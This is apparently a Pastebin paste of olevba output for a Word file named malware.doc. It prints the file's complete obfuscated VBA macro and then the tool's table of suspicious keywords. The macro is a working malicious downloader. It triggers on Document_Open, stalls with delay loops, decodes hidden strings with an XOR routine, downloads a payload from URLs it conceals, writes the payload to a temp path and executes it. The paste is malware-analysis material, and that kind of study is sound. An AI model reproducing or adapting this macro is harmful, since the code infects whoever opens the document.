Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.31 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS-HB-V malware.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: malware.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: malware.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 Then
- Private Declare PtrSafe Function FiOhvKV5yT Lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV" (ByVal InHWN3QclIE As String, JHaob5RaBb0pUW As Long) As Long
- #Else
- Private Declare Function FiOhvKV5yT lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV"(byval InHWN3QclIE as String, JHaob5RaBb0pUW as Long ) as Long
- #End If
- Private GpkKWN3 As String
- Function N850BCurHo(ByVal LemiyA6QZnuCYC As String, XUn6QwHKyAv As String) As String
- PevSFR3rv0e2RZK = 39
- If PevSFR3rv0e2RZK + MJDM0hu5rU7Tdb > 1 Then
- MJDM0hu5rU7Tdb = 1 + 18
- '19 Clra 16 25
- End If
- MJDM0hu5rU7Tdb = 69
- '82 96 55 EHgu
- On Error Resume Next
- SQoiCuInevSFR3rv0 = 82
- If SQoiCuInevSFR3rv0 + NsNJTqkk3w > 1 Then
- NsNJTqkk3w = 72 + 29
- '32 GvriOI9 94 34
- End If
- NsNJTqkk3w = 44
- '59 39 1 HSHSe4Iv
- Dim GJE0Xk() As Byte, Uu3ahNk9NV(0 To 285) As Integer, CtAp9AJ0lBLNg() As Byte, NyTk5LjHttv, Hboyl0jeJwPSe, L7j2iquXfw8f, HlgcUkRQ3VZtHDYq, L8aV9L4vUWh As Boolean
- It9Acrpc7M = 30
- If It9Acrpc7M + DrjiAY5ezWAm > 1 Then
- DrjiAY5ezWAm = 53 + 31
- '26 RCZpY 14 49
- End If
- DrjiAY5ezWAm = 44
- '87 56 76 HPqsPooeMN9zRPs3
- GJE0Xk = StrConv(LemiyA6QZnuCYC, (64 + 1 + 64 - 1))
- VwkYpXxUG = 28
- If VwkYpXxUG + L7MtzHaiOhvKV > 1 Then
- L7MtzHaiOhvKV = 60 + 12
- '10 HbZCtRcd4hpmvGrNO 41 22
- End If
- L7MtzHaiOhvKV = 27
- '11 59 15 IlWZ1yGPfpiG
- CtAp9AJ0lBLNg() = StrConv(XUn6QwHKyAv, (64 + 5 + 64 - 5))
- C1aZX3huwbllRm = 94
- If C1aZX3huwbllRm + Orcx0psolAwdff4 > 1 Then
- Orcx0psolAwdff4 = 49 + 58
- '84 SgJEI38zx 78 45
- End If
- Orcx0psolAwdff4 = 71
- '20 20 72 TmV0hQRiff
- Hboyl0jeJwPSe = UBound(CtAp9AJ0lBLNg)
- FXBI0cjkxDlMD = 32
- If FXBI0cjkxDlMD + CJqQ7WXZNbh3E > 1 Then
- CJqQ7WXZNbh3E = 10 + 5
- '92 Fh3vFSWMRoJaMPe 28 22
- End If
- CJqQ7WXZNbh3E = 66
- '8 55 66 TytC1onRx
- For NyTk5LjHttv = 0 To (127.5 + 7 + 127.5 - 7)
- Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv
- Next NyTk5LjHttv
- For NyTk5LjHttv = (128 + 2 + 128 - 2) To (142.5 + 2 + 142.5 - 2)
- Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv Xor (128 + 7 + 128 - 7)
- Next NyTk5LjHttv
- For NyTk5LjHttv = 1 To (3 + 8 + 3 - 8)
- Uu3ahNk9NV(NyTk5LjHttv + (124.5 + 1 + 124.5 - 1)) = CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv)
- Uu3ahNk9NV(NyTk5LjHttv - 1) = CtAp9AJ0lBLNg(NyTk5LjHttv - 1) Xor ((127.5 + 6 + 127.5 - 6) - CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv))
- Next NyTk5LjHttv
- L8aV9L4vUWh = False
- L7j2iquXfw8f = 0
- HlgcUkRQ3VZtHDYq = 0
- For NyTk5LjHttv = 0 To UBound(GJE0Xk)
- If L7j2iquXfw8f > Hboyl0jeJwPSe Then L7j2iquXfw8f = 0
- If HlgcUkRQ3VZtHDYq > (142.5 + 6 + 142.5 - 6) And L8aV9L4vUWh = False Then HlgcUkRQ3VZtHDYq = 0: L8aV9L4vUWh = Not (L8aV9L4vUWh)
- If HlgcUkRQ3VZtHDYq > (142.5 + 1 + 142.5 - 1) And L8aV9L4vUWh = True Then HlgcUkRQ3VZtHDYq = (2.5 + 4 + 2.5 - 4): L8aV9L4vUWh = Not (L8aV9L4vUWh)
- GJE0Xk(NyTk5LjHttv) = (GJE0Xk(NyTk5LjHttv) Xor (Uu3ahNk9NV(HlgcUkRQ3VZtHDYq) Xor CtAp9AJ0lBLNg(L7j2iquXfw8f)))
- L7j2iquXfw8f = L7j2iquXfw8f + 1
- HlgcUkRQ3VZtHDYq = HlgcUkRQ3VZtHDYq + 1
- Next NyTk5LjHttv
- WuyDMqJlc9EExGn = 95
- If WuyDMqJlc9EExGn + MD6vOtbeXg08Apf > 1 Then
- MD6vOtbeXg08Apf = 46 + 67
- '56 FRKdQgv8nI4s 91 59
- End If
- MD6vOtbeXg08Apf = 3
- '71 91 4 Dr9gJTFhJbaTyvr
- N850BCurHo = StrConv(GJE0Xk(), (32 + 6 + 32 - 6))
- PQtmFj4 = 59
- If PQtmFj4 + Jy5AeFk8EPh5 > 1 Then
- Jy5AeFk8EPh5 = 81 + 87
- '16 Y28Ireu 57 60
- End If
- Jy5AeFk8EPh5 = 78
- '97 87 44 QSITYPlOzd9wZo5wK
- End Function
- Sub Document_Open()
- Y8zxt6Msdpa = 73
- If Y8zxt6Msdpa + IffQgv8nI4s > 1 Then
- IffQgv8nI4s = 85 + 23
- '38 NlQBbSx8CvjG5n 18 78
- End If
- IffQgv8nI4s = 69
- '70 67 77 SK2Okf9
- On Error Resume Next
- PKaAwdff4 = 59
- If PKaAwdff4 + UGTAOx > 1 Then
- UGTAOx = 3 + 71
- '91 BpX8trlI24f 4 95
- End If
- UGTAOx = 18
- '51 79 94 Seuq3p2oT0
- Dim DrqjA As Long, YsFjPuyG As Long, YhNAv As Long, V6cC3scUY4zddH99R As Long
- Pn2j04QQZ = 39
- If Pn2j04QQZ + PhB4lG17FG95 > 1 Then
- PhB4lG17FG95 = 15 + 88
- '41 WCYB5Gg 83 81
- End If
- PhB4lG17FG95 = 35
- '33 6 14 T85wPN55plLSy
- DrqjA = 97933779: YsFjPuyG = 0: YhNAv = 0
- A9brznS9 = 39
- If A9brznS9 + NZmCtQE > 1 Then
- NZmCtQE = 3 + 59
- '89 Gn0vbN 52 64
- End If
- NZmCtQE = 1
- '17 96 57 WjrO2i
- For YsFjPuyG = 1 To DrqjA
- YhNAv = YhNAv + 1
- Next YsFjPuyG
- SC5Gsa2L8x9 = 53
- If SC5Gsa2L8x9 + YQfGqOLqlO > 1 Then
- YQfGqOLqlO = 61 + 11
- '61 C5Ml9aEwx 82 71
- End If
- YQfGqOLqlO = 7
- '1 44 86 JbPkJ1m84n
- If YhNAv = DrqjA Then
- MBLZvB3itxy = 28
- If MBLZvB3itxy + VGYVXAeUo > 1 Then
- VGYVXAeUo = 10 + 37
- '56 OwEp3rMGmB 24 23
- End If
- VGYVXAeUo = 98
- '98 51 67 YfcNwjt
- Dim JdQXv As Integer, Glu As String
- For JdQXv = 6 To 931
- Glu = Glu + JdQXv
- Next
- QMC2wbN5Ml9a = 30
- If QMC2wbN5Ml9a + JLJBTPQC0v8nPRi > 1 Then
- JLJBTPQC0v8nPRi = 75 + 66
- '23 H1FnrBinFMXuiTr7q 26 88
- End If
- JLJBTPQC0v8nPRi = 27
- '38 53 33 MommQAvjlo
- V6cC3scUY4zddH99R = FiOhvKV5yT("Woslk2fer8", 13)
- NEVW = 27
- If NEVW + AbNNqkZ7MBaO > 1 Then
- AbNNqkZ7MBaO = 85 + 37
- '9 TkPX49TibqGBJxshx 40 47
- End If
- AbNNqkZ7MBaO = 52
- '36 84 40 PATiSzZ0SHp
- If Err.Number = (26.5 + 1 + 26.5 - 1) Then
- ALJBTPQC0v8nPRi = 63
- If ALJBTPQC0v8nPRi + OgAQFxX3NoRJzF0 > 1 Then
- OgAQFxX3NoRJzF0 = 76 + 90
- '49 Bdt9CAhqI 73 72
- End If
- OgAQFxX3NoRJzF0 = 4
- '11 16 48 TaXuqpe9brzn
- Err.Clear
- GdnAtw6pW2Ddd = 21
- If GdnAtw6pW2Ddd + Bn4b3DBA1 > 1 Then
- Bn4b3DBA1 = 57 + 95
- '33 LntwxxRUQfG 22 2
- End If
- Bn4b3DBA1 = 62
- '79 80 77 UWnIyleBDeMMQkBoa
- GpkKWN3 = NQfyvvczlB
- DFx2CkP6uLciomp = 15
- If DFx2CkP6uLciomp + YxN3SKC7rbd4Y0 > 1 Then
- YxN3SKC7rbd4Y0 = 37 + 69
- '98 HPrpdzlNL 13 16
- End If
- YxN3SKC7rbd4Y0 = 34
- '79 69 26 G1kJpKeLjvHFTRm
- Yo0cZy9rsLWc833
- Else
- Cfh6QC = 1
- If Cfh6QC + SahItA7q > 1 Then
- SahItA7q = 51 + 28
- '23 HCOoCyyztc 12 46
- End If
- SahItA7q = 41
- '84 27 74 Ktvz0LH4pnr
- PGYDqcNIiY
- CVrJQakokY = 20
- If CVrJQakokY + Y3Eih8b7DEsD5mvG > 1 Then
- Y3Eih8b7DEsD5mvG = 49 + 34
- '4 ILogRYp5sBH4wIB 69 73
- End If
- Y3Eih8b7DEsD5mvG = 13
- '68 76 4 PMgXukJXdidChXD
- End If
- GD8V9NxlguCc = 31
- If GD8V9NxlguCc + Cbj3Mm1 > 1 Then
- Cbj3Mm1 = 14 + 40
- '60 Re2uopTYl 27 26
- End If
- Cbj3Mm1 = 2
- '75 28 70 PYPrON7WK2JzAOBM
- Else
- SkzzbsvfSyz = 30
- If SkzzbsvfSyz + OKqrI > 1 Then
- OKqrI = 17 + 31
- '88 Kj3Mm1XX0vAd4 14 13
- End If
- OKqrI = 43
- '50 56 40 HViUsnLUZHz
- PGYDqcNIiY
- OEjP2fwXjVZgphAd = 48
- If OEjP2fwXjVZgphAd + O216Y38Y2IQM > 1 Then
- O216Y38Y2IQM = 50 + 91
- '94 PGa6IxNKb0 13 58
- End If
- O216Y38Y2IQM = 21
- '77 8 70 Yn2V1Js3WRXItf4P
- End If
- B1bVxGQc8 = 31
- If B1bVxGQc8 + CHKnEMtktO > 1 Then
- CHKnEMtktO = 49 + 94
- '84 Vcn9fY7O 41 45
- End If
- CHKnEMtktO = 8
- '46 56 72 J375rwVno
- End Sub
- Sub B12q0RLAU(YAz6wXfrk6f5dv As String, Dz1TOyYXiEI9X1 As String)
- Dim Pp3rrlsgf94PVXP6U As Object
- VjnPC7wODO4Jx = 68
- If VjnPC7wODO4Jx + Rqk3uXtteGEZk > 1 Then
- Rqk3uXtteGEZk = 89 + 1
- '93 FhOzcnGer 16 48
- End If
- Rqk3uXtteGEZk = 50
- '91 94 13 SgNKb0
- Set Pp3rrlsgf94PVXP6U = CreateObject(N850BCurHo(Chr$(245) + Chr$(206) + Chr$(216) + Chr$(207) + Chr$(245) + Chr$(178) + Chr$(58) + Chr$(59) + Chr$(54) + Chr$(78) + Chr$(14) + Chr$(32) + Chr$(52) + Chr$(81) + Chr$(39) + Chr$(47) + Chr$(54) + Chr$(55) + Chr$(46) + Chr$(23) + Chr$(25) + Chr$(53) + Chr$(40) + Chr$(75) + Chr$(1) + Chr$(52), "BBT9zYURYi"))
- Oy07ZXh375rw = 66
- If Oy07ZXh375rw + IafTt7I6 > 1 Then
- IafTt7I6 = 95 + 81
- '51 IPwAQevkxJXOs 16 21
- End If
- IafTt7I6 = 60
- '15 24 50 KL1NNvX9M
- With Pp3rrlsgf94PVXP6U.CREATEtEXTFILe(YAz6wXfrk6f5dv)
- FnGerJrNK5Me = 59
- If FnGerJrNK5Me + D7E2ALYP > 1 Then
- D7E2ALYP = 18 + 87
- '79 MHSxliGq 57 96
- End If
- D7E2ALYP = 78
- '60 87 7 RwchV
- .WRiTE (Dz1TOyYXiEI9X1)
- WKjDoHr5iKzkpVwg2 = 72
- If WKjDoHr5iKzkpVwg2 + QcB20uYVs9TKjI > 1 Then
- QcB20uYVs9TKjI = 24 + 23
- '53 T86tdYttAG8H2 34 39
- End If
- QcB20uYVs9TKjI = 24
- '71 27 86 HZonet6216Y38Y2I
- .Close
- JFqOLICehY = 88
- If JFqOLICehY + H5Gi4s6Oh > 1 Then
- H5Gi4s6Oh = 28 + 83
- '91 YfJW0b1SpgJJ 19 39
- End If
- H5Gi4s6Oh = 79
- '5 80 54 R2EarR9dQ6
- End With
- Bhv4rFyKDKXTO = 95
- If Bhv4rFyKDKXTO + KKSWCkv > 1 Then
- KKSWCkv = 96 + 38
- '41 T61Q0H4n2uSis 59 5
- End If
- KKSWCkv = 68
- '25 55 18 Qcwh3Dw
- Set Pp3rrlsgf94PVXP6U = Nothing
- RyXDLrCTEUdfgw = 27
- If RyXDLrCTEUdfgw + UUTkQyfMsfxt > 1 Then
- UUTkQyfMsfxt = 76 + 27
- '48 TkQyfMsf 37 72
- End If
- UUTkQyfMsfxt = 66
- '10 52 84 VFnmj
- End Sub
- Sub AzGSEXj0198(YgWPvZP1GI6MAx6 As Long)
- EvGXxSr = 14
- If EvGXxSr + MwNvccke53sI > 1 Then
- MwNvccke53sI = 15 + 12
- '21 X9w2oS3F 92 78
- End If
- MwNvccke53sI = 92
- '51 3 74 NYr9z
- Dim HTvFxkntQn7 As Long
- Wsu2EarR9dQ = 17
- If Wsu2EarR9dQ + CvU49QGChAHz2YU > 1 Then
- CvU49QGChAHz2YU = 77 + 24
- '58 C1MjOEfC3K7tGTTZ 8 58
- End If
- CvU49QGChAHz2YU = 80
- '68 4 71 QinpPH
- HTvFxkntQn7 = Timer + YgWPvZP1GI6MAx6
- Do While Timer < HTvFxkntQn7
- DoEvents
- Loop
- P26QLde5nGzV = 25
- If P26QLde5nGzV + Ab4PHJ9i3Pqz > 1 Then
- Ab4PHJ9i3Pqz = 8 + 34
- '54 C3bLu3db 21 20
- End If
- Ab4PHJ9i3Pqz = 95
- '69 22 64 IxyptdjM
- End Sub
- Sub Yo0cZy9rsLWc833()
- HtdjMDb8fByV = 35
- If HtdjMDb8fByV + PgGhGyO1BQj > 1 Then
- PgGhGyO1BQj = 38 + 1
- '40 QUJFvPh2RB8 50 66
- End If
- PgGhGyO1BQj = 45
- '7 24 25 EpUcR3zs
- Dim G5UczWAvCd8 As String, Jy6OeQYzbkLfj4 As Object
- IBDicnTaoZ = 62
- If IBDicnTaoZ + SCrQim0cZ3bLu3d > 1 Then
- SCrQim0cZ3bLu3d = 83 + 94
- '86 BbDpG 10 42
- End If
- SCrQim0cZ3bLu3d = 44
- '85 87 6 Tee9PKR9nm
- G5UczWAvCd8 = Environ(N850BCurHo(Chr$(207) + Chr$(227) + Chr$(223) + Chr$(162) + Chr$(241) + Chr$(189) + Chr$(81), "INw1nf6o9PlQb")) & N850BCurHo(Chr$(231) + Chr$(236) + Chr$(254) + Chr$(248) + Chr$(214) + Chr$(130) + Chr$(19) + Chr$(62) + Chr$(5) + Chr$(27) + Chr$(41) + Chr$(40) + Chr$(85) + Chr$(71) + Chr$(55) + Chr$(16) + Chr$(43) + Chr$(16), "Jl3XOXwRJDj") & GpkKWN3 & N850BCurHo(Chr$(128) + Chr$(203) + Chr$(215) + Chr$(211), "YTfXIPQQT")
- SDKtuw = 90
- If SDKtuw + P9MZ56WLHCqol > 1 Then
- P9MZ56WLHCqol = 62 + 74
- '88 FKO 21 72
- End If
- P9MZ56WLHCqol = 70
- '2 82 87 X6sACIZZnE1Gh8
- Set Jy6OeQYzbkLfj4 = CreateObject(N850BCurHo(Chr$(193) + Chr$(211) + Chr$(241) + Chr$(215) + Chr$(218) + Chr$(205) + Chr$(58) + Chr$(32) + Chr$(54) + Chr$(125) + Chr$(63) + Chr$(3) + Chr$(51) + Chr$(22) + Chr$(27) + Chr$(17) + Chr$(26), "AJZmEsS"))
- Hpwu6Bl = 72
- If Hpwu6Bl + YeBQPr1wAvqimGhpX > 1 Then
- YeBQPr1wAvqimGhpX = 95 + 2
- '30 HCXroKyiQXE3xbOh 71 73
- End If
- YeBQPr1wAvqimGhpX = 91
- '11 1 57 VbiBYEmq
- Jy6OeQYzbkLfj4.Open N850BCurHo(Chr$(193) + Chr$(232) + Chr$(243), "Bm1NBcQZfBt9jXRy3"), N850BCurHo(Chr$(246) + Chr$(192) + Chr$(199) + Chr$(186) + Chr$(137) + Chr$(191) + Chr$(101) + Chr$(36) + Chr$(8) + Chr$(10) + Chr$(47) + Chr$(34) + Chr$(42) + Chr$(16) + Chr$(52) + Chr$(83) + Chr$(57) + Chr$(45) + Chr$(29) + Chr$(14) + Chr$(125) + Chr$(48) + Chr$(36) + Chr$(87) + Chr$(62) + Chr$(67) + Chr$(120) + Chr$(58) + Chr$(13) + Chr$(11) + Chr$(102), "GFSoL5LKaq") & NQfyvvczlB, 0
- Ofj = 9
- If Ofj + W5u9qigla6 > 1 Then
- W5u9qigla6 = 59 + 81
- '69 U7QtWvY42JwDW 5 72
- End If
- W5u9qigla6 = 16
- '84 6 17 QdLhShR
- Jy6OeQYzbkLfj4.seND
- If Jy6OeQYzbkLfj4.Status = (100 + 8 + 100 - 8) Then
- P92RvX1OyI = 77
- If P92RvX1OyI + Tlpy4pOJB > 1 Then
- Tlpy4pOJB = 1 + 33
- '61 AGoCC 3 78
- End If
- Tlpy4pOJB = 96
- '42 33 89 Bu3P6
- GoTo KNCjFjtSsUu5k
- H0oXKiA6m = 76
- If H0oXKiA6m + XCPhIXE1Gh8 > 1 Then
- XCPhIXE1Gh8 = 4 + 23
- '90 HiJtOsluH 89 65
- End If
- XCPhIXE1Gh8 = 65
- '18 34 58 TOzDi3HsPBkL8
- Else
- AE7aUiUy1UeC = 8
- If AE7aUiUy1UeC + JkwSoTVijR3AJ > 1 Then
- JkwSoTVijR3AJ = 25 + 26
- '23 HXRWM 32 77
- End If
- JkwSoTVijR3AJ = 90
- '4 62 87 EeVp
- Jy6OeQYzbkLfj4.Open N850BCurHo(Chr$(252) + Chr$(251) + Chr$(222), "UgAiwo1aaBuAD6"), N850BCurHo(Chr$(213) + Chr$(191) + Chr$(198) + Chr$(254) + Chr$(188) + Chr$(129) + Chr$(31) + Chr$(49) + Chr$(30) + Chr$(30) + Chr$(46) + Chr$(76) + Chr$(38) + Chr$(73) + Chr$(58) + Chr$(2) + Chr$(0) + Chr$(53) + Chr$(74) + Chr$(127) + Chr$(65) + Chr$(43) + Chr$(2) + Chr$(73) + Chr$(63) + Chr$(66) + Chr$(118) + Chr$(71) + Chr$(61) + Chr$(3) + Chr$(80), "QyqM4B6") & NQfyvvczlB, 0
- Cuo52olTIbaOgrZ = 94
- If Cuo52olTIbaOgrZ + GWaauGfzntoPg1G > 1 Then
- GWaauGfzntoPg1G = 63 + 84
- '95 TNk2R 87 11
- End If
- GWaauGfzntoPg1G = 43
- '45 86 89 IGdAaRv6BeMop0Yaa
- Jy6OeQYzbkLfj4.seND
- KDEkUqsxrgrl = 9
- If KDEkUqsxrgrl + NKenP > 1 Then
- NKenP = 49 + 26
- '44 Mj3bKHSNEWmeIz 89 79
- End If
- NKenP = 36
- '40 3 41 YY5zn3cWqt5
- If Jy6OeQYzbkLfj4.Status = (100 + 3 + 100 - 3) Then
- NpvGZ5rgZCRTUq = 61
- If NpvGZ5rgZCRTUq + QLq6CSMT43j > 1 Then
- QLq6CSMT43j = 38 + 33
- '22 Q3G7TIMG 57 51
- End If
- QLq6CSMT43j = 94
- '63 84 95 LLcyM2peGdAaRv6
- GoTo KNCjFjtSsUu5k
- VKk7tqLDBK = 93
- If VKk7tqLDBK + NMYJ7d > 1 Then
- NMYJ7d = 66 + 74
- '24 Uf3dQjvfSG 74 96
- End If
- NMYJ7d = 84
- '20 14 58 DMan98xPTEU
- End If
- SdBIZAZSNSJfKpj = 52
- If SdBIZAZSNSJfKpj + GKdU3l > 1 Then
- GKdU3l = 6 + 44
- '4 Uv4zBtOced 50 84
- End If
- GKdU3l = 8
- '85 80 68 DuZIfom1Aeq1A
- End If
- Rr4tm1pHovm = 22
- If Rr4tm1pHovm + OOkRBHQv2V > 1 Then
- OOkRBHQv2V = 95 + 48
- '91 TRENEsFLooSq 88 43
- End If
- OOkRBHQv2V = 7
- '41 14 22 PpmSWyrtSkqQ
- Exit Sub
- TLNBz3utPpNHz3 = 97
- If TLNBz3utPpNHz3 + YAPZSY4KGk8Mmi > 1 Then
- YAPZSY4KGk8Mmi = 17 + 84
- '83 D0QxudBKVKW 59 59
- End If
- YAPZSY4KGk8Mmi = 12
- '28 52 6 GKxbCDNIqKCpcq
- KNCjFjtSsUu5k:
- RLbJpjLUKSC17r = 22
- If RLbJpjLUKSC17r + VqWASNqmC4f3jp > 1 Then
- VqWASNqmC4f3jp = 95 + 48
- '91 PfamB 88 43
- End If
- VqWASNqmC4f3jp = 7
- '41 14 22 OFE
- AzGSEXj0198 (1 + 9 + 1 - 9)
- AC6Seuk = 41
- If AC6Seuk + GqPWcAOvvXX > 1 Then
- GqPWcAOvvXX = 26 + 19
- '41 CQLLEMenC 73 2
- End If
- GqPWcAOvvXX = 43
- '20 38 83 DofpgnNPhc
- B12q0RLAU G5UczWAvCd8, N850BCurHo(StrConv(Jy6OeQYzbkLfj4.resPOnSeBodY, (32 + 3 + 32 - 3)), N850BCurHo(Chr$(211) + Chr$(235) + Chr$(202) + Chr$(160) + Chr$(216) + Chr$(249) + Chr$(112) + Chr$(89) + Chr$(15) + Chr$(111) + Chr$(86), "MWwoL0A7qSjF"))
- O5V6ScwVCAZ = 27
- If O5V6ScwVCAZ + PXxhQZeju > 1 Then
- PXxhQZeju = 15 + 50
- '45 IngzthtttId 88 57
- End If
- PXxhQZeju = 77
- '89 81 4 KHzH6kuqC0TL80
- CreateObject(N850BCurHo(Chr$(251) + Chr$(229) + Chr$(196) + Chr$(204) + Chr$(220) + Chr$(252) + Chr$(32) + Chr$(88) + Chr$(26) + Chr$(39) + Chr$(28) + Chr$(45) + Chr$(33), "HFEg5mRqAFsJAXISn")).Run """" & G5UczWAvCd8 & """"
- RDyJ7Y = 52
- If RDyJ7Y + HukbQ > 1 Then
- HukbQ = 93 + 41
- '26 EM6EP9G1 19 41
- End If
- HukbQ = 73
- '2 43 20 HErA9V4SK2W
- Set Jy6OeQYzbkLfj4 = Nothing
- End Sub
- Sub PGYDqcNIiY()
- FSytexzdRD = 9
- If FSytexzdRD + BIds252 > 1 Then
- BIds252 = 24 + 4
- '64 M9kCIWJkz39tjuedSsx 55 56
- End If
- BIds252 = 53
- '63 34 21 WJkz39tjuedS
- TimeValue 77
- OZymfbItYx = UCase(6)
- YIMdX5LppqEnQYKt = QBColor(20)
- SHIpR8r0U6XL = CurDir
- Hour 23
- IN1K98kRLjtt6n3hA = Dir("VVdgLL8J8GsT50BFu")
- If CByte(41) = True Then FOtBdLFOEImukpB = 8676
- NPer 33, 37, 12
- Rate 48, 64, 44
- Command
- Month 5
- Rnd
- AppActivate 95
- Load BgtwAmm
- Tan 96
- Err.Raise 93
- Sqr 3
- If CDbl(74) = True Then Hy485SM = 87
- DDB 2, 33, 84, 83
- Year 14
- DateAdd "IE7XitPAb4xP", 94, 83
- Weekday 32
- JjNFS = Day(87)
- Loc 47
- IGe6BI0fWwS = Cos(10)
- ChDir 43
- Second 8
- IMVlVpey78hH6 = CVDate(85)
- ChDrive 26
- Err.Clear
- G04GvszyHcz7cUz = 59
- If G04GvszyHcz7cUz + EG1gFhqZ > 1 Then
- EG1gFhqZ = 57 + 88
- '95 RvBGuX 1 85
- End If
- EG1gFhqZ = 33
- '62 48 18 GpCqyVrr
- End Sub
- Function NQfyvvczlB() As String
- YJIxHpJTHPyKYz = 94
- If YJIxHpJTHPyKYz + CAwmLM > 1 Then
- CAwmLM = 25 + 32
- '38 KEALS7PCSeJF8XbJ 22 69
- End If
- CAwmLM = 26
- '84 54 46 XCUmU
- Dim KHK50vUSWRXp As Long
- Rvwe6AD2e2R2 = 81
- If Rvwe6AD2e2R2 + Q8eCMd1 > 1 Then
- Q8eCMd1 = 6 + 5
- '36 J1m983Xb0Ro 43 48
- End If
- Q8eCMd1 = 32
- '80 9 94 PxfC3IiEmZ
- KBTQl75TBRxS:
- Hz9biQhNoy = 22
- If Hz9biQhNoy + UE8BFCtLq3pdRI > 1 Then
- UE8BFCtLq3pdRI = 84 + 96
- '33 QhNoy 49 29
- End If
- UE8BFCtLq3pdRI = 89
- '80 81 78 IHPSHJLrgQCWdpaQ0
- Randomize
- MAvFduSXDsQzeGbCs = 62
- If MAvFduSXDsQzeGbCs + Rf9cavtzvtaGn8 > 1 Then
- Rf9cavtzvtaGn8 = 8 + 97
- '55 VB4TDZNH6xVvAx 58 21
- End If
- Rf9cavtzvtaGn8 = 59
- '70 85 65 PhrAJP4Z5
- KHK50vUSWRXp = Int((4999.5 + 5 + 4999.5 - 5) * Rnd)
- EW1hJ0wrkq9c = 44
- If EW1hJ0wrkq9c + J9KlHAPO6Be > 1 Then
- J9KlHAPO6Be = 78 + 73
- '17 O9YtO 59 7
- End If
- J9KlHAPO6Be = 18
- '10 33 39 Q7pMOMRcYyZHZd
- If KHK50vUSWRXp < (49.5 + 6 + 49.5 - 6) Then GoTo KBTQl75TBRxS
- N7hDrZw3PV = 12
- If N7hDrZw3PV + L14gSB4TDZNH > 1 Then
- L14gSB4TDZNH = 2 + 58
- '62 A6xVvAxgzJqDs 25 37
- End If
- L14gSB4TDZNH = 73
- '89 69 30 HaAooKzRxBoNXCkkC
- NQfyvvczlB = KHK50vUSWRXp
- V0CqzFv63ukddr = 61
- If V0CqzFv63ukddr + Ca1OA > 1 Then
- Ca1OA = 37 + 26
- '6 Pfmhh9O5qs4y 66 83
- End If
- Ca1OA = 84
- '81 91 62 KL8QYMjG9cmlo
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | Document_Open | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Run | May run an executable file or a system |
- | | | command |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateTextFile | May create a text file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | AppActivate | May control another application by |
- | | | simulating user keystrokes |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement